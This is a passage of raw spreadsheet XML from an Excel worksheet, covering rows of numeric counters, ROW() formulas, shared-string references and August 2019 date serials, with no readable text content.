        <v>23487</v>
      </c>
    </row>
    <row r="13184" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13184">
        <f t="shared" si="205"/>
        <v>13183</v>
      </c>
      <c r="B13184">
        <v>3183</v>
      </c>
      <c r="C13184" t="s">
        <v>19637</v>
      </c>
      <c r="D13184" s="1">
        <v>43697</v>
      </c>
      <c r="E13184" t="s">
        <v>20655</v>
      </c>
      <c r="F13184" t="s">
        <v>9978</v>
      </c>
      <c r="G13184" t="s">
        <v>23488</v>
      </c>
    </row>
    <row r="13185" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13185">
        <f t="shared" si="205"/>
        <v>13184</v>
      </c>
      <c r="B13185">
        <v>3184</v>
      </c>
      <c r="C13185" t="s">
        <v>19637</v>
      </c>
      <c r="D13185" s="1">
        <v>43691</v>
      </c>
      <c r="F13185" t="s">
        <v>10526</v>
      </c>
      <c r="G13185" t="s">
        <v>23489</v>
      </c>
    </row>
    <row r="13186" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13186">
        <f t="shared" si="205"/>
        <v>13185</v>
      </c>
      <c r="B13186">
        <v>3185</v>
      </c>
      <c r="C13186" t="s">
        <v>19637</v>
      </c>
      <c r="D13186" s="1">
        <v>43689</v>
      </c>
      <c r="E13186" t="s">
        <v>19717</v>
      </c>
      <c r="F13186" t="s">
        <v>10526</v>
      </c>
      <c r="G13186" t="s">
        <v>23490</v>
      </c>
    </row>
    <row r="13187" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13187">
        <f t="shared" ref="A13187:A13250" si="206">+ROW(A13186)</f>
        <v>13186</v>
      </c>
      <c r="B13187">
        <v>3186</v>
      </c>
      <c r="C13187" t="s">
        <v>19637</v>
      </c>
      <c r="D13187" s="1">
        <v>43698</v>
      </c>
      <c r="F13187" t="s">
        <v>10526</v>
      </c>
      <c r="G13187" t="s">
        <v>23491</v>
      </c>
    </row>
    <row r="13188" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13188">
        <f t="shared" si="206"/>
        <v>13187</v>
      </c>
      <c r="B13188">
        <v>3187</v>
      </c>
      <c r="C13188" t="s">
        <v>19637</v>
      </c>
      <c r="D13188" s="1">
        <v>43681</v>
      </c>
      <c r="E13188" t="s">
        <v>19680</v>
      </c>
      <c r="F13188" t="s">
        <v>10021</v>
      </c>
      <c r="G13188" t="s">
        <v>23492</v>
      </c>
    </row>
    <row r="13189" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13189">
        <f t="shared" si="206"/>
        <v>13188</v>
      </c>
      <c r="B13189">
        <v>3188</v>
      </c>
      <c r="C13189" t="s">
        <v>19637</v>
      </c>
      <c r="D13189" s="1">
        <v>43703</v>
      </c>
      <c r="E13189" t="s">
        <v>23493</v>
      </c>
      <c r="F13189" t="s">
        <v>10526</v>
      </c>
      <c r="G13189" t="s">
        <v>23494</v>
      </c>
    </row>
    <row r="13190" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13190">
        <f t="shared" si="206"/>
        <v>13189</v>
      </c>
      <c r="B13190">
        <v>3189</v>
      </c>
      <c r="C13190" t="s">
        <v>19637</v>
      </c>
      <c r="D13190" s="1">
        <v>43682</v>
      </c>
      <c r="E13190" t="s">
        <v>19640</v>
      </c>
      <c r="F13190" t="s">
        <v>10021</v>
      </c>
      <c r="G13190" t="s">
        <v>23495</v>
      </c>
    </row>
    <row r="13191" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13191">
        <f t="shared" si="206"/>
        <v>13190</v>
      </c>
      <c r="B13191">
        <v>3190</v>
      </c>
      <c r="C13191" t="s">
        <v>19637</v>
      </c>
      <c r="D13191" s="1">
        <v>43696</v>
      </c>
      <c r="F13191" t="s">
        <v>10526</v>
      </c>
      <c r="G13191" t="s">
        <v>23496</v>
      </c>
    </row>
    <row r="13192" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13192">
        <f t="shared" si="206"/>
        <v>13191</v>
      </c>
      <c r="B13192">
        <v>3191</v>
      </c>
      <c r="C13192" t="s">
        <v>19637</v>
      </c>
      <c r="D13192" s="1">
        <v>43682</v>
      </c>
      <c r="E13192" t="s">
        <v>19917</v>
      </c>
      <c r="F13192" t="s">
        <v>9975</v>
      </c>
      <c r="G13192" t="s">
        <v>23497</v>
      </c>
    </row>
    <row r="13193" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13193">
        <f t="shared" si="206"/>
        <v>13192</v>
      </c>
      <c r="B13193">
        <v>3192</v>
      </c>
      <c r="C13193" t="s">
        <v>19637</v>
      </c>
      <c r="D13193" s="1">
        <v>43701</v>
      </c>
      <c r="E13193" t="s">
        <v>23498</v>
      </c>
      <c r="F13193" t="s">
        <v>10526</v>
      </c>
      <c r="G13193" t="s">
        <v>23499</v>
      </c>
    </row>
    <row r="13194" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13194">
        <f t="shared" si="206"/>
        <v>13193</v>
      </c>
      <c r="B13194">
        <v>3193</v>
      </c>
      <c r="C13194" t="s">
        <v>19637</v>
      </c>
      <c r="D13194" s="1">
        <v>43678</v>
      </c>
      <c r="E13194" t="s">
        <v>19640</v>
      </c>
      <c r="F13194" t="s">
        <v>9975</v>
      </c>
      <c r="G13194" t="s">
        <v>23500</v>
      </c>
    </row>
    <row r="13195" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13195">
        <f t="shared" si="206"/>
        <v>13194</v>
      </c>
      <c r="B13195">
        <v>3194</v>
      </c>
      <c r="C13195" t="s">
        <v>19637</v>
      </c>
      <c r="D13195" s="1">
        <v>43699</v>
      </c>
      <c r="E13195" t="s">
        <v>20458</v>
      </c>
      <c r="F13195" t="s">
        <v>9978</v>
      </c>
      <c r="G13195" t="s">
        <v>23501</v>
      </c>
    </row>
    <row r="13196" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13196">
        <f t="shared" si="206"/>
        <v>13195</v>
      </c>
      <c r="B13196">
        <v>3195</v>
      </c>
      <c r="C13196" t="s">
        <v>19637</v>
      </c>
      <c r="D13196" s="1">
        <v>43694</v>
      </c>
      <c r="E13196" t="s">
        <v>23502</v>
      </c>
      <c r="F13196" t="s">
        <v>9978</v>
      </c>
      <c r="G13196" t="s">
        <v>23503</v>
      </c>
    </row>
    <row r="13197" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13197">
        <f t="shared" si="206"/>
        <v>13196</v>
      </c>
      <c r="B13197">
        <v>3196</v>
      </c>
      <c r="C13197" t="s">
        <v>19637</v>
      </c>
      <c r="D13197" s="1">
        <v>43697</v>
      </c>
      <c r="E13197" t="s">
        <v>19638</v>
      </c>
      <c r="F13197" t="s">
        <v>10021</v>
      </c>
      <c r="G13197" t="s">
        <v>23504</v>
      </c>
    </row>
    <row r="13198" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13198">
        <f t="shared" si="206"/>
        <v>13197</v>
      </c>
      <c r="B13198">
        <v>3197</v>
      </c>
      <c r="C13198" t="s">
        <v>19637</v>
      </c>
      <c r="D13198" s="1">
        <v>43680</v>
      </c>
      <c r="E13198" t="s">
        <v>19653</v>
      </c>
      <c r="F13198" t="s">
        <v>9975</v>
      </c>
      <c r="G13198" t="s">
        <v>23505</v>
      </c>
    </row>
    <row r="13199" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13199">
        <f t="shared" si="206"/>
        <v>13198</v>
      </c>
      <c r="B13199">
        <v>3198</v>
      </c>
      <c r="C13199" t="s">
        <v>19637</v>
      </c>
      <c r="D13199" s="1">
        <v>43703</v>
      </c>
      <c r="E13199" t="s">
        <v>19685</v>
      </c>
      <c r="F13199" t="s">
        <v>9978</v>
      </c>
      <c r="G13199" t="s">
        <v>23506</v>
      </c>
    </row>
    <row r="13200" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13200">
        <f t="shared" si="206"/>
        <v>13199</v>
      </c>
      <c r="B13200">
        <v>3199</v>
      </c>
      <c r="C13200" t="s">
        <v>19637</v>
      </c>
      <c r="D13200" s="1">
        <v>43685</v>
      </c>
      <c r="E13200" t="s">
        <v>19741</v>
      </c>
      <c r="F13200" t="s">
        <v>9975</v>
      </c>
      <c r="G13200" t="s">
        <v>23507</v>
      </c>
    </row>
    <row r="13201" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13201">
        <f t="shared" si="206"/>
        <v>13200</v>
      </c>
      <c r="B13201">
        <v>3200</v>
      </c>
      <c r="C13201" t="s">
        <v>19637</v>
      </c>
      <c r="D13201" s="1">
        <v>43679</v>
      </c>
      <c r="F13201" t="s">
        <v>10526</v>
      </c>
      <c r="G13201" t="s">
        <v>23508</v>
      </c>
    </row>
    <row r="13202" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13202">
        <f t="shared" si="206"/>
        <v>13201</v>
      </c>
      <c r="B13202">
        <v>3201</v>
      </c>
      <c r="C13202" t="s">
        <v>19637</v>
      </c>
      <c r="D13202" s="1">
        <v>43679</v>
      </c>
      <c r="F13202" t="s">
        <v>10526</v>
      </c>
      <c r="G13202" t="s">
        <v>23509</v>
      </c>
    </row>
    <row r="13203" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13203">
        <f t="shared" si="206"/>
        <v>13202</v>
      </c>
      <c r="B13203">
        <v>3202</v>
      </c>
      <c r="C13203" t="s">
        <v>19637</v>
      </c>
      <c r="D13203" s="1">
        <v>43698</v>
      </c>
      <c r="F13203" t="s">
        <v>10526</v>
      </c>
      <c r="G13203" t="s">
        <v>23510</v>
      </c>
    </row>
    <row r="13204" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13204">
        <f t="shared" si="206"/>
        <v>13203</v>
      </c>
      <c r="B13204">
        <v>3203</v>
      </c>
      <c r="C13204" t="s">
        <v>19637</v>
      </c>
      <c r="D13204" s="1">
        <v>43703</v>
      </c>
      <c r="E13204" t="s">
        <v>19974</v>
      </c>
      <c r="F13204" t="s">
        <v>9978</v>
      </c>
      <c r="G13204" t="s">
        <v>23511</v>
      </c>
    </row>
    <row r="13205" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13205">
        <f t="shared" si="206"/>
        <v>13204</v>
      </c>
      <c r="B13205">
        <v>3204</v>
      </c>
      <c r="C13205" t="s">
        <v>19637</v>
      </c>
      <c r="D13205" s="1">
        <v>43705</v>
      </c>
      <c r="F13205" t="s">
        <v>10526</v>
      </c>
      <c r="G13205" t="s">
        <v>23512</v>
      </c>
    </row>
    <row r="13206" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13206">
        <f t="shared" si="206"/>
        <v>13205</v>
      </c>
      <c r="B13206">
        <v>3205</v>
      </c>
      <c r="C13206" t="s">
        <v>19637</v>
      </c>
      <c r="D13206" s="1">
        <v>43683</v>
      </c>
      <c r="F13206" t="s">
        <v>10526</v>
      </c>
      <c r="G13206" t="s">
        <v>23513</v>
      </c>
    </row>
    <row r="13207" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13207">
        <f t="shared" si="206"/>
        <v>13206</v>
      </c>
      <c r="B13207">
        <v>3206</v>
      </c>
      <c r="C13207" t="s">
        <v>19637</v>
      </c>
      <c r="D13207" s="1">
        <v>43700</v>
      </c>
      <c r="F13207" t="s">
        <v>10526</v>
      </c>
      <c r="G13207" t="s">
        <v>23514</v>
      </c>
    </row>
    <row r="13208" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13208">
        <f t="shared" si="206"/>
        <v>13207</v>
      </c>
      <c r="B13208">
        <v>3207</v>
      </c>
      <c r="C13208" t="s">
        <v>19637</v>
      </c>
      <c r="D13208" s="1">
        <v>43706</v>
      </c>
      <c r="E13208" t="s">
        <v>19695</v>
      </c>
      <c r="F13208" t="s">
        <v>9975</v>
      </c>
      <c r="G13208" t="s">
        <v>20589</v>
      </c>
    </row>
    <row r="13209" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13209">
        <f t="shared" si="206"/>
        <v>13208</v>
      </c>
      <c r="B13209">
        <v>3208</v>
      </c>
      <c r="C13209" t="s">
        <v>19637</v>
      </c>
      <c r="D13209" s="1">
        <v>43697</v>
      </c>
      <c r="E13209" t="s">
        <v>19680</v>
      </c>
      <c r="F13209" t="s">
        <v>10021</v>
      </c>
      <c r="G13209" t="s">
        <v>23515</v>
      </c>
    </row>
    <row r="13210" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13210">
        <f t="shared" si="206"/>
        <v>13209</v>
      </c>
      <c r="B13210">
        <v>3209</v>
      </c>
      <c r="C13210" t="s">
        <v>19637</v>
      </c>
      <c r="D13210" s="1">
        <v>43700</v>
      </c>
      <c r="E13210" t="s">
        <v>19830</v>
      </c>
      <c r="F13210" t="s">
        <v>10526</v>
      </c>
      <c r="G13210" t="s">
        <v>23516</v>
      </c>
    </row>
    <row r="13211" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13211">
        <f t="shared" si="206"/>
        <v>13210</v>
      </c>
      <c r="B13211">
        <v>3210</v>
      </c>
      <c r="C13211" t="s">
        <v>19637</v>
      </c>
      <c r="D13211" s="1">
        <v>43681</v>
      </c>
      <c r="E13211" t="s">
        <v>19640</v>
      </c>
      <c r="F13211" t="s">
        <v>10526</v>
      </c>
      <c r="G13211" t="s">
        <v>23517</v>
      </c>
    </row>
    <row r="13212" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13212">
        <f t="shared" si="206"/>
        <v>13211</v>
      </c>
      <c r="B13212">
        <v>3211</v>
      </c>
      <c r="C13212" t="s">
        <v>19637</v>
      </c>
      <c r="D13212" s="1">
        <v>43679</v>
      </c>
      <c r="E13212" t="s">
        <v>20532</v>
      </c>
      <c r="F13212" t="s">
        <v>10021</v>
      </c>
      <c r="G13212" t="s">
        <v>23518</v>
      </c>
    </row>
    <row r="13213" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13213">
        <f t="shared" si="206"/>
        <v>13212</v>
      </c>
      <c r="B13213">
        <v>3212</v>
      </c>
      <c r="C13213" t="s">
        <v>19637</v>
      </c>
      <c r="D13213" s="1">
        <v>43681</v>
      </c>
      <c r="E13213" t="s">
        <v>19640</v>
      </c>
      <c r="F13213" t="s">
        <v>9975</v>
      </c>
      <c r="G13213" t="s">
        <v>23519</v>
      </c>
    </row>
    <row r="13214" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13214">
        <f t="shared" si="206"/>
        <v>13213</v>
      </c>
      <c r="B13214">
        <v>3213</v>
      </c>
      <c r="C13214" t="s">
        <v>19637</v>
      </c>
      <c r="D13214" s="1">
        <v>43700</v>
      </c>
      <c r="E13214" t="s">
        <v>19966</v>
      </c>
      <c r="F13214" t="s">
        <v>9978</v>
      </c>
      <c r="G13214" t="s">
        <v>23520</v>
      </c>
    </row>
    <row r="13215" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13215">
        <f t="shared" si="206"/>
        <v>13214</v>
      </c>
      <c r="B13215">
        <v>3214</v>
      </c>
      <c r="C13215" t="s">
        <v>19637</v>
      </c>
      <c r="D13215" s="1">
        <v>43684</v>
      </c>
      <c r="F13215" t="s">
        <v>10526</v>
      </c>
      <c r="G13215" t="s">
        <v>23521</v>
      </c>
    </row>
    <row r="13216" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13216">
        <f t="shared" si="206"/>
        <v>13215</v>
      </c>
      <c r="B13216">
        <v>3215</v>
      </c>
      <c r="C13216" t="s">
        <v>19637</v>
      </c>
      <c r="D13216" s="1">
        <v>43698</v>
      </c>
      <c r="F13216" t="s">
        <v>10526</v>
      </c>
      <c r="G13216" t="s">
        <v>23522</v>
      </c>
    </row>
    <row r="13217" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13217">
        <f t="shared" si="206"/>
        <v>13216</v>
      </c>
      <c r="B13217">
        <v>3216</v>
      </c>
      <c r="C13217" t="s">
        <v>19637</v>
      </c>
      <c r="D13217" s="1">
        <v>43685</v>
      </c>
      <c r="F13217" t="s">
        <v>10526</v>
      </c>
      <c r="G13217" t="s">
        <v>23523</v>
      </c>
    </row>
    <row r="13218" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13218">
        <f t="shared" si="206"/>
        <v>13217</v>
      </c>
      <c r="B13218">
        <v>3217</v>
      </c>
      <c r="C13218" t="s">
        <v>19637</v>
      </c>
      <c r="D13218" s="1">
        <v>43703</v>
      </c>
      <c r="E13218" t="s">
        <v>19879</v>
      </c>
      <c r="F13218" t="s">
        <v>10021</v>
      </c>
      <c r="G13218" t="s">
        <v>23524</v>
      </c>
    </row>
    <row r="13219" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13219">
        <f t="shared" si="206"/>
        <v>13218</v>
      </c>
      <c r="B13219">
        <v>3218</v>
      </c>
      <c r="C13219" t="s">
        <v>19637</v>
      </c>
      <c r="D13219" s="1">
        <v>43678</v>
      </c>
      <c r="E13219" t="s">
        <v>19648</v>
      </c>
      <c r="F13219" t="s">
        <v>10021</v>
      </c>
      <c r="G13219" t="s">
        <v>23525</v>
      </c>
    </row>
    <row r="13220" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13220">
        <f t="shared" si="206"/>
        <v>13219</v>
      </c>
      <c r="B13220">
        <v>3219</v>
      </c>
      <c r="C13220" t="s">
        <v>19637</v>
      </c>
      <c r="D13220" s="1">
        <v>43706</v>
      </c>
      <c r="E13220" t="s">
        <v>19640</v>
      </c>
      <c r="F13220" t="s">
        <v>9975</v>
      </c>
      <c r="G13220" t="s">
        <v>23526</v>
      </c>
    </row>
    <row r="13221" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13221">
        <f t="shared" si="206"/>
        <v>13220</v>
      </c>
      <c r="B13221">
        <v>3220</v>
      </c>
      <c r="C13221" t="s">
        <v>19637</v>
      </c>
      <c r="D13221" s="1">
        <v>43703</v>
      </c>
      <c r="E13221" t="s">
        <v>19879</v>
      </c>
      <c r="F13221" t="s">
        <v>10021</v>
      </c>
      <c r="G13221" t="s">
        <v>23527</v>
      </c>
    </row>
    <row r="13222" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13222">
        <f t="shared" si="206"/>
        <v>13221</v>
      </c>
      <c r="B13222">
        <v>3221</v>
      </c>
      <c r="C13222" t="s">
        <v>19637</v>
      </c>
      <c r="D13222" s="1">
        <v>43692</v>
      </c>
      <c r="E13222" t="s">
        <v>23528</v>
      </c>
      <c r="F13222" t="s">
        <v>9978</v>
      </c>
      <c r="G13222" t="s">
        <v>23529</v>
      </c>
    </row>
    <row r="13223" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13223">
        <f t="shared" si="206"/>
        <v>13222</v>
      </c>
      <c r="B13223">
        <v>3222</v>
      </c>
      <c r="C13223" t="s">
        <v>19637</v>
      </c>
      <c r="D13223" s="1">
        <v>43699</v>
      </c>
      <c r="E13223" t="s">
        <v>19672</v>
      </c>
      <c r="F13223" t="s">
        <v>10021</v>
      </c>
      <c r="G13223" t="s">
        <v>23530</v>
      </c>
    </row>
    <row r="13224" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13224">
        <f t="shared" si="206"/>
        <v>13223</v>
      </c>
      <c r="B13224">
        <v>3223</v>
      </c>
      <c r="C13224" t="s">
        <v>19637</v>
      </c>
      <c r="D13224" s="1">
        <v>43695</v>
      </c>
      <c r="E13224" t="s">
        <v>20187</v>
      </c>
      <c r="F13224" t="s">
        <v>9975</v>
      </c>
      <c r="G13224" t="s">
        <v>23531</v>
      </c>
    </row>
    <row r="13225" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13225">
        <f t="shared" si="206"/>
        <v>13224</v>
      </c>
      <c r="B13225">
        <v>3224</v>
      </c>
      <c r="C13225" t="s">
        <v>19637</v>
      </c>
      <c r="D13225" s="1">
        <v>43698</v>
      </c>
      <c r="E13225" t="s">
        <v>19725</v>
      </c>
      <c r="F13225" t="s">
        <v>9978</v>
      </c>
      <c r="G13225" t="s">
        <v>23532</v>
      </c>
    </row>
    <row r="13226" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13226">
        <f t="shared" si="206"/>
        <v>13225</v>
      </c>
      <c r="B13226">
        <v>3225</v>
      </c>
      <c r="C13226" t="s">
        <v>19637</v>
      </c>
      <c r="D13226" s="1">
        <v>43688</v>
      </c>
      <c r="E13226" t="s">
        <v>19640</v>
      </c>
      <c r="F13226" t="s">
        <v>10021</v>
      </c>
      <c r="G13226" t="s">
        <v>23533</v>
      </c>
    </row>
    <row r="13227" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13227">
        <f t="shared" si="206"/>
        <v>13226</v>
      </c>
      <c r="B13227">
        <v>3226</v>
      </c>
      <c r="C13227" t="s">
        <v>19637</v>
      </c>
      <c r="D13227" s="1">
        <v>43698</v>
      </c>
      <c r="E13227" t="s">
        <v>23534</v>
      </c>
      <c r="F13227" t="s">
        <v>9978</v>
      </c>
      <c r="G13227" t="s">
        <v>23535</v>
      </c>
    </row>
    <row r="13228" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13228">
        <f t="shared" si="206"/>
        <v>13227</v>
      </c>
      <c r="B13228">
        <v>3227</v>
      </c>
      <c r="C13228" t="s">
        <v>19637</v>
      </c>
      <c r="D13228" s="1">
        <v>43691</v>
      </c>
      <c r="F13228" t="s">
        <v>10526</v>
      </c>
      <c r="G13228" t="s">
        <v>23536</v>
      </c>
    </row>
    <row r="13229" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13229">
        <f t="shared" si="206"/>
        <v>13228</v>
      </c>
      <c r="B13229">
        <v>3228</v>
      </c>
      <c r="C13229" t="s">
        <v>19637</v>
      </c>
      <c r="D13229" s="1">
        <v>43693</v>
      </c>
      <c r="E13229" t="s">
        <v>19690</v>
      </c>
      <c r="F13229" t="s">
        <v>9978</v>
      </c>
      <c r="G13229" t="s">
        <v>23537</v>
      </c>
    </row>
    <row r="13230" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13230">
        <f t="shared" si="206"/>
        <v>13229</v>
      </c>
      <c r="B13230">
        <v>3229</v>
      </c>
      <c r="C13230" t="s">
        <v>19637</v>
      </c>
      <c r="D13230" s="1">
        <v>43706</v>
      </c>
      <c r="F13230" t="s">
        <v>10526</v>
      </c>
      <c r="G13230" t="s">
        <v>23538</v>
      </c>
    </row>
    <row r="13231" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13231">
        <f t="shared" si="206"/>
        <v>13230</v>
      </c>
      <c r="B13231">
        <v>3230</v>
      </c>
      <c r="C13231" t="s">
        <v>19637</v>
      </c>
      <c r="D13231" s="1">
        <v>43701</v>
      </c>
      <c r="E13231" t="s">
        <v>20220</v>
      </c>
      <c r="F13231" t="s">
        <v>10021</v>
      </c>
      <c r="G13231" t="s">
        <v>23539</v>
      </c>
    </row>
    <row r="13232" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13232">
        <f t="shared" si="206"/>
        <v>13231</v>
      </c>
      <c r="B13232">
        <v>3231</v>
      </c>
      <c r="C13232" t="s">
        <v>19637</v>
      </c>
      <c r="D13232" s="1">
        <v>43681</v>
      </c>
      <c r="E13232" t="s">
        <v>20034</v>
      </c>
      <c r="F13232" t="s">
        <v>10021</v>
      </c>
      <c r="G13232" t="s">
        <v>23540</v>
      </c>
    </row>
    <row r="13233" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13233">
        <f t="shared" si="206"/>
        <v>13232</v>
      </c>
      <c r="B13233">
        <v>3232</v>
      </c>
      <c r="C13233" t="s">
        <v>19637</v>
      </c>
      <c r="D13233" s="1">
        <v>43702</v>
      </c>
      <c r="F13233" t="s">
        <v>10526</v>
      </c>
      <c r="G13233" t="s">
        <v>23541</v>
      </c>
    </row>
    <row r="13234" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13234">
        <f t="shared" si="206"/>
        <v>13233</v>
      </c>
      <c r="B13234">
        <v>3233</v>
      </c>
      <c r="C13234" t="s">
        <v>19637</v>
      </c>
      <c r="D13234" s="1">
        <v>43702</v>
      </c>
      <c r="E13234" t="s">
        <v>19725</v>
      </c>
      <c r="F13234" t="s">
        <v>9978</v>
      </c>
      <c r="G13234" t="s">
        <v>23542</v>
      </c>
    </row>
    <row r="13235" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13235">
        <f t="shared" si="206"/>
        <v>13234</v>
      </c>
      <c r="B13235">
        <v>3234</v>
      </c>
      <c r="C13235" t="s">
        <v>19637</v>
      </c>
      <c r="D13235" s="1">
        <v>43678</v>
      </c>
      <c r="E13235" t="s">
        <v>19640</v>
      </c>
      <c r="F13235" t="s">
        <v>9975</v>
      </c>
      <c r="G13235" t="s">
        <v>23543</v>
      </c>
    </row>
    <row r="13236" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13236">
        <f t="shared" si="206"/>
        <v>13235</v>
      </c>
      <c r="B13236">
        <v>3235</v>
      </c>
      <c r="C13236" t="s">
        <v>19637</v>
      </c>
      <c r="D13236" s="1">
        <v>43703</v>
      </c>
      <c r="E13236" t="s">
        <v>23544</v>
      </c>
      <c r="F13236" t="s">
        <v>10526</v>
      </c>
      <c r="G13236" t="s">
        <v>23545</v>
      </c>
    </row>
    <row r="13237" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13237">
        <f t="shared" si="206"/>
        <v>13236</v>
      </c>
      <c r="B13237">
        <v>3236</v>
      </c>
      <c r="C13237" t="s">
        <v>19637</v>
      </c>
      <c r="D13237" s="1">
        <v>43689</v>
      </c>
      <c r="E13237" t="s">
        <v>19680</v>
      </c>
      <c r="F13237" t="s">
        <v>10021</v>
      </c>
      <c r="G13237" t="s">
        <v>23546</v>
      </c>
    </row>
    <row r="13238" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13238">
        <f t="shared" si="206"/>
        <v>13237</v>
      </c>
      <c r="B13238">
        <v>3237</v>
      </c>
      <c r="C13238" t="s">
        <v>19637</v>
      </c>
      <c r="D13238" s="1">
        <v>43690</v>
      </c>
      <c r="E13238" t="s">
        <v>23547</v>
      </c>
      <c r="F13238" t="s">
        <v>10526</v>
      </c>
      <c r="G13238" t="s">
        <v>23548</v>
      </c>
    </row>
    <row r="13239" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13239">
        <f t="shared" si="206"/>
        <v>13238</v>
      </c>
      <c r="B13239">
        <v>3238</v>
      </c>
      <c r="C13239" t="s">
        <v>19637</v>
      </c>
      <c r="D13239" s="1">
        <v>43684</v>
      </c>
      <c r="E13239" t="s">
        <v>19640</v>
      </c>
      <c r="F13239" t="s">
        <v>10021</v>
      </c>
      <c r="G13239" t="s">
        <v>23549</v>
      </c>
    </row>
    <row r="13240" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13240">
        <f t="shared" si="206"/>
        <v>13239</v>
      </c>
      <c r="B13240">
        <v>3239</v>
      </c>
      <c r="C13240" t="s">
        <v>19637</v>
      </c>
      <c r="D13240" s="1">
        <v>43678</v>
      </c>
      <c r="E13240" t="s">
        <v>21389</v>
      </c>
      <c r="F13240" t="s">
        <v>9975</v>
      </c>
      <c r="G13240" t="s">
        <v>23550</v>
      </c>
    </row>
    <row r="13241" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13241">
        <f t="shared" si="206"/>
        <v>13240</v>
      </c>
      <c r="B13241">
        <v>3240</v>
      </c>
      <c r="C13241" t="s">
        <v>19637</v>
      </c>
      <c r="D13241" s="1">
        <v>43703</v>
      </c>
      <c r="F13241" t="s">
        <v>10526</v>
      </c>
      <c r="G13241" t="s">
        <v>23551</v>
      </c>
    </row>
    <row r="13242" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13242">
        <f t="shared" si="206"/>
        <v>13241</v>
      </c>
      <c r="B13242">
        <v>3241</v>
      </c>
      <c r="C13242" t="s">
        <v>19637</v>
      </c>
      <c r="D13242" s="1">
        <v>43696</v>
      </c>
      <c r="F13242" t="s">
        <v>10526</v>
      </c>
      <c r="G13242" t="s">
        <v>23552</v>
      </c>
    </row>
    <row r="13243" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13243">
        <f t="shared" si="206"/>
        <v>13242</v>
      </c>
      <c r="B13243">
        <v>3242</v>
      </c>
      <c r="C13243" t="s">
        <v>19637</v>
      </c>
      <c r="D13243" s="1">
        <v>43706</v>
      </c>
      <c r="E13243" t="s">
        <v>20515</v>
      </c>
      <c r="F13243" t="s">
        <v>10021</v>
      </c>
      <c r="G13243" t="s">
        <v>23553</v>
      </c>
    </row>
    <row r="13244" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13244">
        <f t="shared" si="206"/>
        <v>13243</v>
      </c>
      <c r="B13244">
        <v>3243</v>
      </c>
      <c r="C13244" t="s">
        <v>19637</v>
      </c>
      <c r="D13244" s="1">
        <v>43699</v>
      </c>
      <c r="E13244" t="s">
        <v>19648</v>
      </c>
      <c r="F13244" t="s">
        <v>10021</v>
      </c>
      <c r="G13244" t="s">
        <v>23554</v>
      </c>
    </row>
    <row r="13245" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13245">
        <f t="shared" si="206"/>
        <v>13244</v>
      </c>
      <c r="B13245">
        <v>3244</v>
      </c>
      <c r="C13245" t="s">
        <v>19637</v>
      </c>
      <c r="D13245" s="1">
        <v>43688</v>
      </c>
      <c r="E13245" t="s">
        <v>19830</v>
      </c>
      <c r="F13245" t="s">
        <v>10526</v>
      </c>
      <c r="G13245" t="s">
        <v>23555</v>
      </c>
    </row>
    <row r="13246" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13246">
        <f t="shared" si="206"/>
        <v>13245</v>
      </c>
      <c r="B13246">
        <v>3245</v>
      </c>
      <c r="C13246" t="s">
        <v>19637</v>
      </c>
      <c r="D13246" s="1">
        <v>43699</v>
      </c>
      <c r="E13246" t="s">
        <v>19750</v>
      </c>
      <c r="F13246" t="s">
